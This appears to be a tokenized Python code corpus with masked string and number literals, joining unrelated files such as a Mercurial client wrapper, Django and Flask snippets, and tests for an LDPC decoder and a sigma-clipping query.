<s> import collections <EOL> import raco . scheme as scheme <EOL> import raco . myrial . myrial_test as myrial_test <EOL> from raco import types <EOL> class SigmaClippingTest ( myrial_test . MyrialTestCase ) : <EOL> points = [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] <EOL> points_tuples = [ ( i , x ) for i , x in enumerate ( points ) ] <EOL> points_table = collections . Counter ( points_tuples ) <EOL> points_schema = scheme . Scheme ( [ ( '<STR_LIT:id>' , types . LONG_TYPE ) , ( '<STR_LIT:v>' , types . DOUBLE_TYPE ) ] ) <EOL> points_key = "<STR_LIT>" <EOL> def setUp ( self ) : <EOL> super ( SigmaClippingTest , self ) . setUp ( ) <EOL> self . db . ingest ( SigmaClippingTest . points_key , <EOL> SigmaClippingTest . points_table , <EOL> SigmaClippingTest . points_schema ) <EOL> self . db . ingest ( "<STR_LIT>" , collections . Counter ( ) , <EOL> SigmaClippingTest . points_schema ) <EOL> def run_it ( self , query ) : <EOL> points = [ ( i , x ) for i , x in self . points_tuples if x < <NUM_LIT> and x > <NUM_LIT> ] <EOL> expected = collections . Counter ( points ) <EOL> self . check_result ( query , expected , output = '<STR_LIT>' ) <EOL> def test_v0 ( self ) : <EOL> with open ( '<STR_LIT>' ) as fh : <EOL> query = fh . read ( ) <EOL> self . run_it ( query ) <EOL> def test_v2 ( self ) : <EOL> with open ( '<STR_LIT>' ) as fh : <EOL> query = fh . read ( ) <EOL> self . run_it ( query ) </s>
<s> from qbittorrent . client import Client </s>
<s> from data_importer . importers . base import * <EOL> from data_importer . importers . csv_importer import * <EOL> from data_importer . importers . xls_importer import * <EOL> from data_importer . importers . xlsx_importer import * <EOL> from data_importer . importers . xml_importer import * <EOL> from data_importer . importers . generic import * </s>
<s> from django . test import TestCase <EOL> from mock import Mock <EOL> import sys <EOL> from data_importer import forms <EOL> from imp import reload <EOL> class TestFileUploadForm ( TestCase ) : <EOL> def setUp ( self ) : <EOL> self . form = forms . FileUploadForm ( ) <EOL> def test_invalid_form ( self ) : <EOL> self . assertFalse ( self . form . is_valid ( ) ) <EOL> def test_default_importer ( self ) : <EOL> self . assertEqual ( self . form . importer , None ) <EOL> def test_default_importer_task ( self ) : <EOL> self . assertEqual ( self . form . is_task , True ) <EOL> class TestTaskImporter ( TestCase ) : <EOL> def test_celery_importer ( self ) : <EOL> sys . modules [ '<STR_LIT>' ] = Mock ( ) <EOL> reload ( forms ) <EOL> self . assertEqual ( forms . HAS_CELERY , True ) </s>
<s> import os <EOL> from flask import Flask <EOL> from flask_mwoauth import MWOAuth <EOL> from builtins import input <EOL> app = Flask ( __name__ ) <EOL> app . secret_key = os . urandom ( <NUM_LIT> ) <EOL> print ( """<STR_LIT>""" ) <EOL> consumer_key = input ( '<STR_LIT>' ) <EOL> consumer_secret = input ( '<STR_LIT>' ) <EOL> mwoauth = MWOAuth ( consumer_key = consumer_key , consumer_secret = consumer_secret ) <EOL> app . register_blueprint ( mwoauth . bp ) <EOL> @ app . route ( "<STR_LIT:/>" ) <EOL> def index ( ) : <EOL> return "<STR_LIT>" + repr ( mwoauth . get_current_user ( False ) ) + "<STR_LIT>" + "<STR_LIT>" <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> app . run ( debug = True ) </s>
<s> from django . test import TestCase <EOL> from model_mommy . utils import import_if_str <EOL> from test . generic . models import User <EOL> class TestUtils ( TestCase ) : <EOL> def test_import_from_str ( self ) : <EOL> self . assertRaises ( AttributeError , <EOL> import_if_str , '<STR_LIT>' ) <EOL> self . assertRaises ( ImportError , <EOL> import_if_str , '<STR_LIT>' ) <EOL> self . assertEqual ( User , import_if_str ( '<STR_LIT>' ) ) <EOL> def test_import_if_str ( self ) : <EOL> self . assertRaises ( AttributeError , <EOL> import_if_str , '<STR_LIT>' ) <EOL> self . assertRaises ( ImportError , <EOL> import_if_str , '<STR_LIT>' ) <EOL> self . assertEqual ( User , import_if_str ( '<STR_LIT>' ) ) <EOL> self . assertEqual ( User , import_if_str ( User ) ) </s>
<s> '''<STR_LIT>''' <EOL> import unittest <EOL> from django import template <EOL> from easytags import EasyLibrary <EOL> from easytags import EasyNode , EasyAsNode <EOL> class LibraryTests ( unittest . TestCase ) : <EOL> def test_easy_library_register_easy_node ( self ) : <EOL> def test_tag ( context ) : <EOL> return u'<STR_LIT>' <EOL> register = EasyLibrary ( ) <EOL> register . easytag ( test_tag ) <EOL> parser = template . Parser ( [ ] ) <EOL> token = template . Token ( template . TOKEN_BLOCK , '<STR_LIT>' ) <EOL> self . assertTrue ( '<STR_LIT>' in register . tags ) <EOL> test_node = register . tags [ '<STR_LIT>' ] ( parser , token ) <EOL> self . assertTrue ( isinstance ( test_node , EasyNode ) ) <EOL> context = template . Context ( { } ) <EOL> self . assertEquals ( u'<STR_LIT>' , test_node . render ( context ) ) <EOL> def test_easy_library_register_easy_node_with_parameters ( self ) : <EOL> def test_tag ( context , arg1 ) : <EOL> return arg1 <EOL> register = EasyLibrary ( ) <EOL> register . easytag ( test_tag ) <EOL> parser = template . Parser ( [ ] ) <EOL> token = template . Token ( template . TOKEN_BLOCK , '<STR_LIT>' ) <EOL> test_node = register . tags [ '<STR_LIT>' ] ( parser , token ) <EOL> context = template . Context ( { } ) <EOL> self . assertEquals ( u'<STR_LIT>' , test_node . render ( context ) ) <EOL> def test_easy_library_register_tags_with_custom_names ( self ) : <EOL> def test_tag ( context ) : <EOL> return u'<STR_LIT>' <EOL> register = EasyLibrary ( ) <EOL> register . easytag ( '<STR_LIT>' , test_tag ) <EOL> self . assertTrue ( '<STR_LIT>' in register . tags ) <EOL> def test_easy_library_register_tags_as_decorating_method ( self ) : <EOL> def test_tag ( context ) : <EOL> return u'<STR_LIT>' <EOL> register = EasyLibrary ( ) <EOL> register . easytag ( ) ( test_tag ) <EOL> self . assertTrue ( '<STR_LIT>' in register . 
tags ) <EOL> def test_easy_library_register_tags_as_decorating_method_with_name ( self ) : <EOL> def test_tag ( context ) : <EOL> return u'<STR_LIT>' <EOL> register = EasyLibrary ( ) <EOL> register . easytag ( '<STR_LIT>' ) ( test_tag ) <EOL> self . assertTrue ( '<STR_LIT>' in register . tags ) <EOL> def test_easy_library_register_tags_as_decorating_method_with_name_kwarg ( self ) : <EOL> def test_tag ( context ) : <EOL> return u'<STR_LIT>' <EOL> register = EasyLibrary ( ) <EOL> register . easytag ( name = '<STR_LIT>' ) ( test_tag ) <EOL> self . assertTrue ( '<STR_LIT>' in register . tags ) <EOL> def test_easy_library_register_tags_keeps_decorated_function_data ( self ) : <EOL> def test_tag ( context ) : <EOL> return u'<STR_LIT>' <EOL> register = EasyLibrary ( ) <EOL> test_tag = register . easytag ( name = '<STR_LIT>' ) ( test_tag ) <EOL> self . assertEquals ( '<STR_LIT>' , test_tag . __name__ ) <EOL> def test_easy_library_register_as_tags ( self ) : <EOL> def test_tag ( context ) : <EOL> return u'<STR_LIT>' <EOL> register = EasyLibrary ( ) <EOL> register . easyastag ( test_tag ) <EOL> parser = template . Parser ( [ ] ) <EOL> token = template . Token ( template . TOKEN_BLOCK , '<STR_LIT>' ) <EOL> self . assertTrue ( '<STR_LIT>' in register . tags ) <EOL> test_node = register . tags [ '<STR_LIT>' ] ( parser , token ) <EOL> self . assertTrue ( isinstance ( test_node , EasyAsNode ) ) <EOL> context = template . Context ( { } ) <EOL> self . assertEquals ( u'<STR_LIT>' , test_node . render ( context ) ) <EOL> self . assertEquals ( u'<STR_LIT>' , context [ '<STR_LIT>' ] ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import absolute_import , print_function , unicode_literals <EOL> import os <EOL> import sys <EOL> import gzip <EOL> import dateutil . parser <EOL> from vcstools . vcs_base import VcsClientBase , VcsError <EOL> from vcstools . common import sanitized , normalized_rel_path , run_shell_command <EOL> def _get_hg_version ( ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> value , output , _ = run_shell_command ( '<STR_LIT>' , <EOL> shell = True , <EOL> us_env = True ) <EOL> if value == <NUM_LIT:0> and output is not None and len ( output . splitlines ( ) ) > <NUM_LIT:0> : <EOL> version = output . splitlines ( ) [ <NUM_LIT:0> ] <EOL> else : <EOL> raise VcsError ( "<STR_LIT>" % ( value , output ) ) <EOL> except VcsError as e : <EOL> raise VcsError ( "<STR_LIT>" % e ) <EOL> return version <EOL> def _hg_diff_path_change ( diff , path ) : <EOL> """<STR_LIT>""" <EOL> if diff is None : <EOL> return None <EOL> INIT = <NUM_LIT:0> <EOL> INDIFF = <NUM_LIT:1> <EOL> state = INIT <EOL> s_list = [ line for line in diff . split ( os . linesep ) ] <EOL> lines = [ ] <EOL> for line in s_list : <EOL> if line . startswith ( "<STR_LIT>" ) : <EOL> state = INIT <EOL> if state == INIT : <EOL> if line . startswith ( "<STR_LIT>" ) : <EOL> state = INDIFF <EOL> newline = line <EOL> else : <EOL> if line . startswith ( "<STR_LIT>" ) and not line . startswith ( "<STR_LIT>" ) : <EOL> newline = "<STR_LIT>" % ( path , line [ <NUM_LIT:5> : ] ) <EOL> elif line . startswith ( "<STR_LIT>" ) and not line . startswith ( "<STR_LIT>" ) : <EOL> newline = "<STR_LIT>" % ( path , line [ <NUM_LIT:5> : ] ) <EOL> elif line . startswith ( "<STR_LIT>" ) : <EOL> newline = line . replace ( "<STR_LIT>" , "<STR_LIT:U+0020>" + path + "<STR_LIT:/>" , <NUM_LIT:1> ) <EOL> newline = newline . replace ( "<STR_LIT>" , "<STR_LIT:U+0020>" + path + "<STR_LIT:/>" , <NUM_LIT:1> ) <EOL> else : <EOL> newline = line <EOL> else : <EOL> newline = line <EOL> if newline != '<STR_LIT>' : <EOL> lines . 
append ( newline ) <EOL> result = "<STR_LIT:\n>" . join ( lines ) <EOL> return result <EOL> class HgClient ( VcsClientBase ) : <EOL> def __init__ ( self , path ) : <EOL> """<STR_LIT>""" <EOL> VcsClientBase . __init__ ( self , '<STR_LIT>' , path ) <EOL> _get_hg_version ( ) <EOL> @ staticmethod <EOL> def get_environment_metadata ( ) : <EOL> metadict = { } <EOL> try : <EOL> metadict [ "<STR_LIT:version>" ] = '<STR_LIT:%s>' % _get_hg_version ( ) <EOL> except : <EOL> metadict [ "<STR_LIT:version>" ] = "<STR_LIT>" <EOL> return metadict <EOL> def get_url ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . detect_presence ( ) : <EOL> cmd = "<STR_LIT>" <EOL> _ , output , _ = run_shell_command ( cmd , <EOL> shell = True , <EOL> cwd = self . _path , <EOL> us_env = True ) <EOL> return output . rstrip ( ) <EOL> return None <EOL> @ staticmethod <EOL> def static_detect_presence ( path ) : <EOL> return os . path . isdir ( os . path . join ( path , '<STR_LIT>' ) ) <EOL> def checkout ( self , url , version = '<STR_LIT>' , verbose = False , <EOL> shallow = False , timeout = None ) : <EOL> if url is None or url . strip ( ) == '<STR_LIT>' : <EOL> raise ValueError ( '<STR_LIT>' % url ) <EOL> base_path = os . path . split ( self . get_path ( ) ) [ <NUM_LIT:0> ] <EOL> try : <EOL> os . makedirs ( base_path ) <EOL> except OSError : <EOL> pass <EOL> cmd = "<STR_LIT>" % ( sanitized ( url ) , self . _path ) <EOL> value , _ , msg = run_shell_command ( cmd , <EOL> shell = True , <EOL> no_filter = True ) <EOL> if value != <NUM_LIT:0> : <EOL> if msg : <EOL> sys . logger . error ( '<STR_LIT:%s>' % msg ) <EOL> return False <EOL> if version is not None and version . strip ( ) != '<STR_LIT>' : <EOL> cmd = "<STR_LIT>" % sanitized ( version ) <EOL> value , _ , msg = run_shell_command ( cmd , <EOL> cwd = self . _path , <EOL> shell = True , <EOL> no_filter = True ) <EOL> if value != <NUM_LIT:0> : <EOL> if msg : <EOL> sys . stderr . 
write ( '<STR_LIT>' % msg ) <EOL> return False <EOL> return True <EOL> def update ( self , version = '<STR_LIT>' , verbose = False , timeout = None ) : <EOL> verboseflag = '<STR_LIT>' <EOL> if verbose : <EOL> verboseflag = '<STR_LIT>' <EOL> if not self . detect_presence ( ) : <EOL> sys . stderr . write ( "<STR_LIT>" ) <EOL> return True <EOL> if not self . _do_pull ( ) : <EOL> return False <EOL> if version is not None and version . strip ( ) != '<STR_LIT>' : <EOL> cmd = "<STR_LIT>" % ( verboseflag , sanitized ( version ) ) <EOL> else : <EOL> cmd = "<STR_LIT>" % verboseflag <EOL> value , _ , _ = run_shell_command ( cmd , <EOL> cwd = self . _path , <EOL> shell = True , <EOL> no_filter = True ) <EOL> if value != <NUM_LIT:0> : <EOL> return False <EOL> return True <EOL> def get_version ( self , spec = None ) : <EOL> """<STR_LIT>""" <EOL> if spec is not None : <EOL> if self . detect_presence ( ) : <EOL> command = '<STR_LIT>' % sanitized ( spec ) <EOL> repeated = False <EOL> output = '<STR_LIT>' <EOL> while output == '<STR_LIT>' : <EOL> _ , output , _ = run_shell_command ( command , <EOL> shell = True , <EOL> cwd = self . _path , <EOL> us_env = True ) <EOL> if ( output . strip ( ) != '<STR_LIT>' and <EOL> not output . startswith ( "<STR_LIT>" ) or <EOL> repeated is True ) : <EOL> matches = [ l for l in output . splitlines ( ) if l . startswith ( '<STR_LIT>' ) ] <EOL> if len ( matches ) == <NUM_LIT:1> : <EOL> return matches [ <NUM_LIT:0> ] . split ( '<STR_LIT::>' ) [ <NUM_LIT:2> ] <EOL> else : <EOL> sys . stderr . write ( "<STR_LIT>" % spec ) <EOL> break <EOL> self . _do_pull ( ) <EOL> repeated = True <EOL> return None <EOL> else : <EOL> command = '<STR_LIT>' % self . _path <EOL> _ , output , _ = run_shell_command ( command , shell = True , us_env = True ) <EOL> if output is None or output . strip ( ) == '<STR_LIT>' or output . startswith ( "<STR_LIT>" ) : <EOL> return None <EOL> return output . strip ( ) . 
rstrip ( '<STR_LIT:+>' ) <EOL> def get_current_version_label ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . get_branch ( ) <EOL> def get_branch ( self ) : <EOL> if self . path_exists ( ) : <EOL> command = "<STR_LIT>" % self . get_path ( ) <EOL> _ , output , _ = run_shell_command ( command , shell = True ) <EOL> if output is not None : <EOL> return output . strip ( ) <EOL> return None <EOL> def get_remote_version ( self , fetch = False ) : <EOL> if fetch : <EOL> self . _do_pull ( filter = True ) <EOL> result = self . get_log ( limit = <NUM_LIT:1> ) <EOL> if ( len ( result ) == <NUM_LIT:1> and '<STR_LIT:id>' in result [ <NUM_LIT:0> ] ) : <EOL> return result [ <NUM_LIT:0> ] [ '<STR_LIT:id>' ] <EOL> return None <EOL> def get_diff ( self , basepath = None ) : <EOL> response = None <EOL> if basepath is None : <EOL> basepath = self . _path <EOL> if self . path_exists ( ) : <EOL> rel_path = normalized_rel_path ( self . _path , basepath ) <EOL> command = "<STR_LIT>" % { '<STR_LIT:path>' : sanitized ( rel_path ) } <EOL> _ , response , _ = run_shell_command ( command , shell = True , cwd = basepath ) <EOL> response = _hg_diff_path_change ( response , rel_path ) <EOL> return response <EOL> def get_affected_files ( self , revision ) : <EOL> cmd = "<STR_LIT>" % revision <EOL> code , output , _ = run_shell_command ( cmd , shell = True , cwd = self . _path ) <EOL> affected = [ ] <EOL> if code == <NUM_LIT:0> : <EOL> affected = output . split ( "<STR_LIT:U+0020>" ) <EOL> return affected <EOL> def get_log ( self , relpath = None , limit = None ) : <EOL> response = [ ] <EOL> if relpath is None : <EOL> relpath = '<STR_LIT>' <EOL> if self . path_exists ( ) and os . path . exists ( os . path . join ( self . _path , relpath ) ) : <EOL> limit_cmd = ( ( "<STR_LIT>" % ( int ( limit ) ) ) if limit else "<STR_LIT>" ) <EOL> HG_COMMIT_FIELDS = [ '<STR_LIT:id>' , '<STR_LIT>' , '<STR_LIT:email>' , '<STR_LIT:date>' , '<STR_LIT:message>' ] <EOL> HG_LOG_FORMAT = '<STR_LIT>' . 
join ( [ '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ] ) + '<STR_LIT>' <EOL> command = "<STR_LIT>" % ( sanitized ( relpath ) , <EOL> self . get_branch ( ) , <EOL> HG_LOG_FORMAT , <EOL> limit_cmd ) <EOL> return_code , response_str , stderr = run_shell_command ( command , shell = True , cwd = self . _path ) <EOL> if return_code == <NUM_LIT:0> : <EOL> response = response_str . strip ( '<STR_LIT>' ) . split ( "<STR_LIT>" ) <EOL> response = [ row . strip ( ) . split ( "<STR_LIT>" ) for row in response ] <EOL> response = [ dict ( zip ( HG_COMMIT_FIELDS , row ) ) for row in response ] <EOL> for entry in response : <EOL> entry [ '<STR_LIT:date>' ] = dateutil . parser . parse ( entry [ '<STR_LIT:date>' ] ) <EOL> return response <EOL> def get_status ( self , basepath = None , untracked = False ) : <EOL> response = None <EOL> if basepath is None : <EOL> basepath = self . _path <EOL> if self . path_exists ( ) : <EOL> rel_path = normalized_rel_path ( self . _path , basepath ) <EOL> command = "<STR_LIT>" % { '<STR_LIT:path>' : sanitized ( rel_path ) } <EOL> if not untracked : <EOL> command += "<STR_LIT>" <EOL> _ , response , _ = run_shell_command ( command , <EOL> shell = True , <EOL> cwd = basepath ) <EOL> if response is not None : <EOL> if response . startswith ( "<STR_LIT>" ) : <EOL> raise VcsError ( "<STR_LIT>" % ( command , basepath ) ) <EOL> if len ( response ) > <NUM_LIT:0> and response [ - <NUM_LIT:1> ] != '<STR_LIT:\n>' : <EOL> response += '<STR_LIT:\n>' <EOL> return response <EOL> def export_repository ( self , version , basepath ) : <EOL> cmd = '<STR_LIT>' . format ( version , basepath ) <EOL> result , _ , _ = run_shell_command ( cmd , shell = True , cwd = self . _path ) <EOL> if result : <EOL> return False <EOL> try : <EOL> with open ( basepath + '<STR_LIT>' , '<STR_LIT:rb>' ) as tar_file : <EOL> gzip_file = gzip . open ( basepath + '<STR_LIT>' , '<STR_LIT:wb>' ) <EOL> try : <EOL> gzip_file . 
writelines ( tar_file ) <EOL> finally : <EOL> gzip_file . close ( ) <EOL> finally : <EOL> os . remove ( basepath + '<STR_LIT>' ) <EOL> return True <EOL> def get_branches ( self , local_only = False ) : <EOL> if not local_only : <EOL> self . _do_pull ( ) <EOL> cmd = '<STR_LIT>' <EOL> result , out , _ = run_shell_command ( cmd , shell = True , cwd = self . _path , <EOL> show_stdout = False ) <EOL> if result : <EOL> return [ ] <EOL> branches = [ ] <EOL> for line in out . splitlines ( ) : <EOL> line = line . strip ( ) <EOL> line = line . split ( ) <EOL> branches . append ( line [ <NUM_LIT:0> ] ) <EOL> return branches <EOL> def _do_pull ( self , filter = False ) : <EOL> value , _ , _ = run_shell_command ( "<STR_LIT>" , <EOL> cwd = self . _path , <EOL> shell = True , <EOL> no_filter = not filter ) <EOL> return value == <NUM_LIT:0> <EOL> HGClient = HgClient </s>
<s> ORCID_PUBLIC_BASE_URL = '<STR_LIT>' <EOL> ORCID_SANDBOX_BASE_URL = '<STR_LIT>' </s>
<s> from __future__ import absolute_import , division , print_function , unicode_literals <EOL> __metaclass__ = type <EOL> from . . import Message <EOL> class TestChannel : <EOL> def test_with ( self , conn ) : <EOL> with conn as cxn : <EOL> assert cxn . transport is not None <EOL> with cxn . channel ( <NUM_LIT:1> ) as ch : <EOL> assert <NUM_LIT:1> in cxn . channels <EOL> ch . exchange_declare ( '<STR_LIT>' , '<STR_LIT>' , auto_delete = True ) <EOL> msg = Message ( '<STR_LIT>' , <EOL> content_type = '<STR_LIT>' , <EOL> application_headers = { '<STR_LIT:foo>' : <NUM_LIT:7> , '<STR_LIT:bar>' : '<STR_LIT>' } ) <EOL> ch . basic_publish ( msg , '<STR_LIT>' ) <EOL> assert <NUM_LIT:1> not in cxn . channels <EOL> assert ch . is_open is False <EOL> assert cxn . transport is None </s>
<s> from . . import queue <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> __patched__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> class Queue ( queue . Queue ) : <EOL> def __init__ ( self , maxsize = <NUM_LIT:0> ) : <EOL> if maxsize == <NUM_LIT:0> : <EOL> maxsize = None <EOL> super ( Queue , self ) . __init__ ( maxsize ) <EOL> class PriorityQueue ( queue . PriorityQueue ) : <EOL> def __init__ ( self , maxsize = <NUM_LIT:0> ) : <EOL> if maxsize == <NUM_LIT:0> : <EOL> maxsize = None <EOL> super ( PriorityQueue , self ) . __init__ ( maxsize ) <EOL> class LifoQueue ( queue . LifoQueue ) : <EOL> def __init__ ( self , maxsize = <NUM_LIT:0> ) : <EOL> if maxsize == <NUM_LIT:0> : <EOL> maxsize = None <EOL> super ( LifoQueue , self ) . __init__ ( maxsize ) <EOL> Empty = queue . Empty <EOL> Full = queue . Full </s>
<s> import logging <EOL> from functools import wraps <EOL> import inspect <EOL> import re <EOL> log = logging . getLogger ( '<STR_LIT>' ) <EOL> use_newlines = False <EOL> indent = '<STR_LIT:U+0020>' <EOL> max_param_len = <NUM_LIT:20> <EOL> log_function_start = True <EOL> log_function_exit = True <EOL> RESET = '<STR_LIT>' <EOL> RED = '<STR_LIT>' <EOL> GREEN = '<STR_LIT>' <EOL> YELLOW = '<STR_LIT>' <EOL> BLUE = '<STR_LIT>' <EOL> MAGENTA = '<STR_LIT>' <EOL> CYAN = '<STR_LIT>' <EOL> WHITE = '<STR_LIT>' <EOL> BRGREEN = '<STR_LIT>' <EOL> r_of = re . compile ( '<STR_LIT>' ) <EOL> r_at = re . compile ( '<STR_LIT>' ) <EOL> def parse_repr ( obj ) : <EOL> if inspect . ismethod ( obj ) : <EOL> pat = r_of <EOL> else : <EOL> pat = r_at <EOL> s = repr ( obj ) <EOL> m = re . search ( pat , s ) <EOL> if m : <EOL> return '<STR_LIT>' . format ( m . group ( ) ) <EOL> else : <EOL> return s <EOL> def format_arg ( arg ) : <EOL> """<STR_LIT>""" <EOL> s = str ( arg ) <EOL> if type ( arg ) is type : <EOL> return s <EOL> elif isinstance ( arg , object ) and len ( s ) > max_param_len : <EOL> return parse_repr ( arg ) <EOL> else : <EOL> return s <EOL> def func_name ( f ) : <EOL> """<STR_LIT>""" <EOL> if hasattr ( f , '<STR_LIT>' ) : <EOL> qualname = RESET + f . __qualname__ + BRGREEN <EOL> else : <EOL> qualname = RESET + f . __name__ + BRGREEN <EOL> return qualname <EOL> def log_start ( f , args , kwargs ) : <EOL> argspec = inspect . getargspec ( f ) <EOL> method = False <EOL> if argspec . args and argspec . args [ <NUM_LIT:0> ] == '<STR_LIT>' : <EOL> method = True <EOL> qualname = func_name ( f ) <EOL> f_name = '<STR_LIT:.>' . join ( [ f . __module__ , qualname ] ) <EOL> if method : <EOL> args_list = [ '<STR_LIT>' . 
format ( format_arg ( args [ <NUM_LIT:0> ] ) ) ] <EOL> else : <EOL> args_list = [ ] <EOL> if method : <EOL> args_list += list ( map ( format_arg , args [ <NUM_LIT:1> : ] ) ) <EOL> else : <EOL> args_list += list ( map ( format_arg , args ) ) <EOL> args_list += list ( map ( lambda key : '<STR_LIT>' . format ( key , format_arg ( kwargs [ key ] ) ) , kwargs ) ) <EOL> if use_newlines : <EOL> f_args = '<STR_LIT>' . format ( i = indent ) . join ( args_list ) <EOL> if f_args : <EOL> log . debug ( '<STR_LIT>' <EOL> . format ( i = indent , f_name = f_name , f_args = f_args ) ) <EOL> else : <EOL> log . debug ( '<STR_LIT>' . format ( i = indent , f_name = f_name ) ) <EOL> else : <EOL> f_args = '<STR_LIT:U+002CU+0020>' . join ( args_list ) <EOL> log . debug ( '<STR_LIT>' . format ( f_name = f_name , f_args = f_args ) ) <EOL> def log_exit ( f ) : <EOL> f_name = '<STR_LIT:.>' . join ( [ f . __module__ , func_name ( f ) ] ) <EOL> log . debug ( '<STR_LIT>' . format ( f_name ) ) <EOL> def logged ( f ) : <EOL> """<STR_LIT>""" <EOL> @ wraps ( f ) <EOL> def wrapper ( * args , ** kwargs ) : <EOL> if log_function_start : <EOL> log_start ( f , args , kwargs ) <EOL> ret = f ( * args , ** kwargs ) <EOL> if log_function_exit : <EOL> log_exit ( f ) <EOL> return ret <EOL> return wrapper </s>
<s> from numpy import array , sqrt , zeros <EOL> from numpy . random import randn <EOL> from numpy . testing import assert_allclose <EOL> from commpy . channelcoding . ldpc import get_ldpc_code_params , ldpc_bp_decode <EOL> from commpy . utilities import hamming_dist <EOL> import os <EOL> from nose . plugins . attrib import attr <EOL> @ attr ( '<STR_LIT>' ) <EOL> class TestLDPCCode ( object ) : <EOL> @ classmethod <EOL> def setup_class ( cls ) : <EOL> dir = os . path . dirname ( __file__ ) <EOL> ldpc_design_file_1 = os . path . join ( dir , '<STR_LIT>' ) <EOL> cls . ldpc_code_params = get_ldpc_code_params ( ldpc_design_file_1 ) <EOL> @ classmethod <EOL> def teardown_class ( cls ) : <EOL> pass <EOL> def test_ldpc_bp_decode ( self ) : <EOL> N = <NUM_LIT> <EOL> k = <NUM_LIT> <EOL> rate = <NUM_LIT:0.5> <EOL> Es = <NUM_LIT:1.0> <EOL> snr_list = array ( [ <NUM_LIT> , <NUM_LIT> ] ) <EOL> niters = <NUM_LIT> <EOL> tx_codeword = zeros ( N , int ) <EOL> ldpcbp_iters = <NUM_LIT:100> <EOL> fer_array_ref = array ( [ <NUM_LIT> / <NUM_LIT:1000> , <NUM_LIT> / <NUM_LIT> ] ) <EOL> fer_array_test = zeros ( len ( snr_list ) ) <EOL> for idx , ebno in enumerate ( snr_list ) : <EOL> noise_std = <NUM_LIT:1> / sqrt ( ( <NUM_LIT:10> ** ( ebno / <NUM_LIT> ) ) * rate * <NUM_LIT:2> / Es ) <EOL> fer_cnt_bp = <NUM_LIT:0> <EOL> for iter_cnt in xrange ( niters ) : <EOL> awgn_array = noise_std * randn ( N ) <EOL> rx_word = <NUM_LIT:1> - ( <NUM_LIT:2> * tx_codeword ) + awgn_array <EOL> rx_llrs = <NUM_LIT> * rx_word / ( noise_std ** <NUM_LIT:2> ) <EOL> [ dec_word , out_llrs ] = ldpc_bp_decode ( rx_llrs , self . 
ldpc_code_params , <EOL> ldpcbp_iters ) <EOL> num_bit_errors = hamming_dist ( tx_codeword , dec_word ) <EOL> if num_bit_errors > <NUM_LIT:0> : <EOL> fer_cnt_bp += <NUM_LIT:1> <EOL> if fer_cnt_bp >= <NUM_LIT:200> : <EOL> fer_array_test [ idx ] = float ( fer_cnt_bp ) / ( iter_cnt + <NUM_LIT:1> ) <EOL> break <EOL> assert_allclose ( fer_array_test , fer_array_ref , rtol = <NUM_LIT> , atol = <NUM_LIT:0> ) </s>
<s> import inspect <EOL> from . import fields <EOL> from . utils import fn_name_to_pretty_label <EOL> class BaseActions ( object ) : <EOL> """<STR_LIT>""" <EOL> @ classmethod <EOL> def get_all_actions ( cls ) : <EOL> methods = inspect . getmembers ( cls ) <EOL> return [ { '<STR_LIT:name>' : m [ <NUM_LIT:0> ] , <EOL> '<STR_LIT:label>' : m [ <NUM_LIT:1> ] . label , <EOL> '<STR_LIT>' : m [ <NUM_LIT:1> ] . params <EOL> } for m in methods if getattr ( m [ <NUM_LIT:1> ] , '<STR_LIT>' , False ) ] <EOL> def _validate_action_parameters ( func , params ) : <EOL> """<STR_LIT>""" <EOL> if params is not None : <EOL> valid_fields = [ getattr ( fields , f ) for f in dir ( fields ) if f . startswith ( "<STR_LIT>" ) ] <EOL> for param in params : <EOL> param_name , field_type = param [ '<STR_LIT:name>' ] , param [ '<STR_LIT>' ] <EOL> if param_name not in func . __code__ . co_varnames : <EOL> raise AssertionError ( "<STR_LIT>" "<STR_LIT>" . format ( <EOL> param_name , func . __name__ ) ) <EOL> if field_type not in valid_fields : <EOL> raise AssertionError ( "<STR_LIT>" "<STR_LIT>" . format ( <EOL> field_type , func . __name__ , param_name ) ) <EOL> def rule_action ( label = None , params = None ) : <EOL> """<STR_LIT>""" <EOL> def wrapper ( func ) : <EOL> params_ = params <EOL> if isinstance ( params , dict ) : <EOL> params_ = [ dict ( label = fn_name_to_pretty_label ( name ) , <EOL> name = name , <EOL> fieldType = field_type ) for name , field_type in params . items ( ) ] <EOL> _validate_action_parameters ( func , params_ ) <EOL> func . is_rule_action = True <EOL> func . label = label or fn_name_to_pretty_label ( func . __name__ ) <EOL> func . params = params_ <EOL> return func <EOL> return wrapper </s>
<s> import os <EOL> import sys <EOL> os . environ . setdefault ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> try : <EOL> from funfactory import manage <EOL> except ImportError : <EOL> tmp_path = os . path . join ( os . path . dirname ( os . path . abspath ( __file__ ) ) , <EOL> '<STR_LIT>' , '<STR_LIT:src>' , '<STR_LIT>' ) <EOL> sys . path . append ( tmp_path ) <EOL> from funfactory import manage <EOL> sys . path . remove ( tmp_path ) <EOL> manage . setup_environ ( __file__ , more_pythonic = True ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> manage . main ( ) </s>
<s> from v1pysdk import V1Meta <EOL> v1 = V1Meta ( ) <EOL> new_story = v1 . Story . create ( <EOL> Name = "<STR_LIT>" , <EOL> Scope = v1 . Scope ( <NUM_LIT> ) , <EOL> ) <EOL> new_story . Owners = list ( v1 . Member . where ( Name = "<STR_LIT>" ) ) <EOL> v1 . commit ( ) </s>
